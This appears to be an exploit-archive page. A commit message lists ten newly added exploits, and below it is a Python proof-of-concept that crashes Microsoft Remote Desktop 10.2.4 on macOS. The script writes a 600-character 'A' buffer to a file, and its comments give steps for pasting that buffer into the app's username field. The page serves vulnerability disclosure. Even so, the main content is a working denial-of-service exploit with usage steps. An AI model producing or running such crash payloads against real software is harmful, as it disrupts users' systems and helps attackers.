6e7548ed0d
10 changes to exploits/shellcodes Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC) AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit) Ghostscript 9.26 - Pseudo-Operator Remote Code Execution Joomla! Component J-CruisePortal 6.0.4 - SQL Injection Joomla! Component JHotelReservation 6.0.7 - SQL Injection SimplePress CMS 1.0.7 - SQL Injection SirsiDynix e-Library 3.5.x - Cross-Site Scripting Splunk Enterprise 7.2.3 - Authenticated Custom App RCE ImpressCMS 1.3.11 - 'bid' SQL Injection Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery
24 lines
No EOL
800 B
Python
Executable file
24 lines
No EOL
800 B
Python
Executable file
# Exploit Title: Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
|
|
# Date: 2019/01/24
|
|
# Author: Saeed Hasanzadeh (Net.Hun73r)
|
|
# Twitter: @nethun73r
|
|
# Software Link: https://itunes.apple.com/us/app/microsoft-remote-desktop-10/id1295203466?mt=12
|
|
# Version: 10.2.4(134)
|
|
# Tested on: Mac OS Mojave(10.14.2)
|
|
|
|
# Proof of Concept:
|
|
# Run the python script, it will create a new file "PoC.txt"
|
|
# Copy the text from the generated PoC.txt file to clipboard
|
|
# Paste the text in the add Desktop > add user account >UserName
|
|
# App will now crash
|
|
|
|
buffer = "A" * 600
|
|
payload = buffer
|
|
try:
|
|
f=open("PoC.txt","w")
|
|
print "[+] Creating %s evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |